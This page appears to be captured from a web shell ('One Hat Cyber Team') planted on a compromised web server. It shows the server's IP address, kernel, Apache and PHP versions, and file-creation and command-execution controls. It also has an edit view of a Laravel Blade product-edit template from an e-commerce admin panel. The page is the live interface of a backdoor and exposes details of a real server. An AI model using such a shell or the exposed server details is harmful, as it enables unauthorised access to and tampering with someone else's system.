⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.91
Server IP:
157.245.101.34
Server:
Linux skvinfotech-website 5.4.0-131-generic #147-Ubuntu SMP Fri Oct 14 17:07:22 UTC 2022 x86_64
Server Software:
Apache/2.4.41 (Ubuntu)
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
wesellnew
/
core
/
resources
/
views
/
back
/
item
/
Edit File: edit.blade.php
@extends('master.back') @section('content')
{{ __('Update Product') }}
{{ __('Back') }}
@include('alerts.alerts')
@csrf @method('PUT')
{{ __('Name') }} *
{{ __('Slug') }} *
{{ __('Featured Image') }} *
{{ __('Upload Image...') }}
{{ __('Image Size Should Be 800 x 800. or square size') }}
{{ __('Gallery Images') }}
@forelse($item->galleries as $gallery)
@empty
{{ __('No Images Added') }}
@endforelse
{{ __('Upload Image...') }}
{{ __('Image Size Should Be 800 x 800. or square size') }}
{{ __('Short Description') }} *
{{$item->sort_details}}
{{ __('Description') }} *
{{$item->details}}
{{ __('Product Tags') }}
is_specification ==1 ? 'checked' : ''}}>
{{ __('Specifications') }}
@if(!empty($specification_name)) @foreach(array_combine($specification_name,$specification_description) as $name => $description)
@if($loop->first)
@else
@endif
@endforeach @else
@endif
{{ __('Meta Keywords') }}
{{ __('Meta Description') }}
{{ $item->meta_description }}
{{ __('Update') }}
{{ __('Manage Attributes') }}
{{ __('Current Price') }} *
{{ $curr->sign }}
{{ __('Previous Price') }}
{{ $curr->sign }}
{{ __('Select Category') }} *
@foreach(DB::table('categories')->whereStatus(1)->get() as $cat)
id == $item->category_id ? 'selected' : '' }}>{{ $cat->name }}
@endforeach
{{ __('Select Sub Category') }}
{{__('Select one')}}
@foreach(DB::table('subcategories')->where('category_id',$item->category_id)->whereStatus(1)->get() as $subcat)
id == $item->subcategory_id ? 'selected' : '' }}>{{ $subcat->name }}
@endforeach
{{ __('Select Child Category') }}
{{__('Select one')}}
@foreach(DB::table('chield_categories')->where('category_id',$item->category_id)->whereStatus(1)->get() as $chieldcategory)
id == $item->childcategory_id ? 'selected' : '' }}>{{ $chieldcategory->name }}
@endforeach
{{ __('Select Brand') }}
{{__('Select Brand')}}
@foreach(DB::table('brands')->whereStatus(1)->get() as $brand)
id == $item->brand_id ? 'selected' : ''}} >{{ $brand->name }}
@endforeach
{{ __('Total in stock') }} *
{{ __('Select Tax') }} *
{{__('Select One')}}
@foreach(DB::table('taxes')->whereStatus(1)->get() as $tax)
tax_id == $tax->id ? 'selected' : ''}} >{{ $tax->name }}
@endforeach
{{ __('SKU') }} *
{{ __('Vido Link') }}
{{-- DELETE MODAL --}}
{{ __('Confirm Delete?') }}
×
{{ __('You are going to delete this image from gallery.') }} {{ __('Do you want to delete it?') }}
{{-- DELETE MODAL ENDS --}} @endsection
Simpan